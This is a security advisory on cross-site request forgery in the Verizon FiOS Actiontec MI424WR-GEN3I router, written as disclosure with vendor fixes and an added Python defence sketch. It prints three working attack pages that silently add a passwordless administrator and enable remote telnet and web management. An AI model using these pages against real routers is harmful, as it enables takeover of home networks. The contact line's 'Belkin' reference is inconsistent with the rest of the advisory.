Taking over the Verizon FiOS Actiontec Model MI424WR-GEN3I

  • The Verizon Actiontec can be taken over by a remote adversary through CSRF attack.

Description

The Verizon FiOS Actiontec MI424WR-GEN3I router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that, when executed by an unsuspecting device administrator, adds an additional administrator account and enables remote web and telnet management services.

Attack Requirements

For the attack to succeed, an Actiontec device administrator must have an active management session established with the router and must browse to a web page controlled by the attacker. The forged form submissions are then sent from the administrator's browser and are processed by the router because that session is current.

Details

All HTML forms present in the Verizon FiOS Actiontec MI424WR-GEN3I are susceptible to Cross-Site Request Forgery.

  • Vulnerable firmware version: 40.19.36.
  • Other versions of firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site Request Forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP Referer checking should be enabled.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.
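The two vendor recommendations above, worked through as an added example (not ISE's or Actiontec's code): a per-session, per-form HMAC token plus an Origin/Referer check placed in front of a state-changing POST such as the one to index.cgi. The router origin, server key and session id are assumed values; the forged request is constructed from the first proof-of-concept form below.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlsplit

# Assumption: the router's own origin, taken from the PoC form action http://192.168.1.1/index.cgi.
ROUTER_ORIGIN = "http://192.168.1.1"


def _mac(server_key: bytes, session_id: str, form_name: str, nonce: str) -> str:
    return hmac.new(server_key, f"{session_id}|{form_name}|{nonce}".encode(), hashlib.sha256).hexdigest()


def issue_form_token(server_key: bytes, session_id: str, form_name: str,
                     nonce: Optional[str] = None) -> str:
    """Mint a token bound to one session and one HTML form: nonce + HMAC(key, session|form|nonce)."""
    nonce = nonce or secrets.token_hex(16)
    return f"{nonce}.{_mac(server_key, session_id, form_name, nonce)}"


def verify_form_token(server_key: bytes, session_id: str, form_name: str, token: str) -> bool:
    """Recompute the HMAC for this session and form; constant-time compare so the check cannot be timed."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    return hmac.compare_digest(_mac(server_key, session_id, form_name, nonce).encode(), mac.encode())


def source_is_router(headers: Dict[str, str]) -> bool:
    """Referer/Origin check: the POST must come from a page the router itself served; absent both, reject."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == ROUTER_ORIGIN


def accept_state_change(server_key: bytes, session_id: Optional[str], form_name: str,
                        headers: Dict[str, str], fields: Dict[str, str]) -> bool:
    """Gate for a state-changing POST: a live session alone (all the PoC relies on) is not enough."""
    if not session_id or not source_is_router(headers):
        return False
    return verify_form_token(server_key, session_id, form_name, fields.get("csrf_token", ""))


# Constructed request modelled on the PoC's add-administrator form: sent from the attacker's host, no token.
FORGED_HEADERS = {"Referer": "http://10.0.1.101/verizonFIOS2.html"}
FORGED_FIELDS = {"active_page": "101", "page_title": "User Settings", "username": "G42", "user_level": "2"}


def poc_request_accepted(server_key: bytes, session_id: str) -> bool:
    """Evaluate the forged add-administrator request against the hardened gate (expected: rejected)."""
    return accept_state_change(server_key, session_id, "User Settings", FORGED_HEADERS, FORGED_FIELDS)
```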

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that an Actiontec device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the Actiontec router, the form submissions are processed.

The first form (Figure 1) is pre-filled with the information required to add a new administrative user to the router. The form is automatically submitted after a 1 second delay, and the victim's browser is then redirected to a second page.


<html>
<head>
<title>Actiontec Verizon FiOS CSRF - Adding Administrator User</title>
</head>
<!--Actiontec Model: MI424WR-GEN3I -->
<!--Firmware Version: 40.19.36 -->

<body>
<h1>Please sit tight while we upgrade your router</h1>

<form name="verizonActiontec" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="user_id" value="-1"/>
<input type="hidden" name="fullname_defval" value=""/>
<input type="hidden" name="fullname" value="g42"/>
<input type="hidden" name="username_defval" value=""/>
<input type="hidden" name="username" value="G42"/>
<input type="hidden" name="user_level" value="2"/>
<input type="hidden" name="email_system_notify_level" value="15"/>
<input type="hidden" name="email_security_notify_level" value="15"/>
</form>

<script>
// After a 1 second delay, open the second attack page and submit the forged form.
function CSRF1() { window.open("http://10.0.1.101/verizonFIOS2.html"); }
window.setTimeout(CSRF1, 1000);
function CSRF2() { document.verizonActiontec.submit(); }
window.setTimeout(CSRF2, 1000);
</script>

</body>
</html>

Figure 1. Attack page 1.

This second page (Figure 2) is pre-filled with the information required to add a user with no password. Again, the form is automatically submitted on behalf of the victim, and then redirects to a third page.


<html>
<head>
<title>Actiontec Verizon FiOS CSRF2 - Add User w/ No Pass Confirmation</title>
</head>

<body>

<form name="verizonActiontecC" action="http://192.168.1.1/index.cgi" 
	method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" 
	value="submit_button_confirm_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
</form>

<script>
// After 500 ms, open the third attack page and submit the confirmation form.
// (The original literal 0500 is parsed by JavaScript as octal, i.e. 320 ms.)
function CSRF1() { window.open("http://10.0.1.101/verizonFIOS3.html"); }
window.setTimeout(CSRF1, 500);
function CSRF2() { document.verizonActiontecC.submit(); }
window.setTimeout(CSRF2, 500);
</script>

</body>
</html>

Figure 2. Attack page 2.

The third page (Figure 3) is pre-filled with the information required to enable remote administration of the Actiontec. The attack is complete.


<html>
<head>
<title>Actiontec Verizon FIOS CSRF3 - Enable Remote Administration</title>
</head>

<body>

<form name="verizonActiontecRemote" action="http://192.168.1.1/index.cgi" 
	method="post">
<input type="hidden" name="active_page" value="9078"/>
<input type="hidden" name="active_page_str" value="page_remote_admin"/>
<input type="hidden" name="page_title" value="Remote Administration"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value=""/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="is_telnet_primary" value="1"/>
<input type="hidden" name="is_telnet_primary_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary_defval" value="0"/>
<input type="hidden" name="is_telnet_ssl_defval" value="0"/>
<input type="hidden" name="is_http_primary_defval" value="0"/>
<input type="hidden" name="is_http_secondary_defval" value="0"/>
<input type="hidden" name="is_https_primary_defval" value="0"/>
<input type="hidden" name="is_https_secondary_defval" value="0"/>
<input type="hidden" name="is_diagnostics_icmp_defval" value="0"/>
<input type="hidden" name="is_diagnostics_traceroute_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary" value="1"/>
</form>

<script>
// Submit the remote administration form immediately (no delay).
function CSRF1() { document.verizonActiontecRemote.submit(); }
window.setTimeout(CSRF1, 0);
</script>

</body>
</html>

Figure 3. Attack page 3.

At this point, the attacker can remotely administer, and thereby remotely control, the Actiontec.

References

  • Advisory/Video: Hak42 InfoSec
  • US-CERT Disclosure: CERT Advisory
  • CVE-2013-0126: Cross-Site Request Forgery
  • CVE-2013-3097: Cross-Site Scripting

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io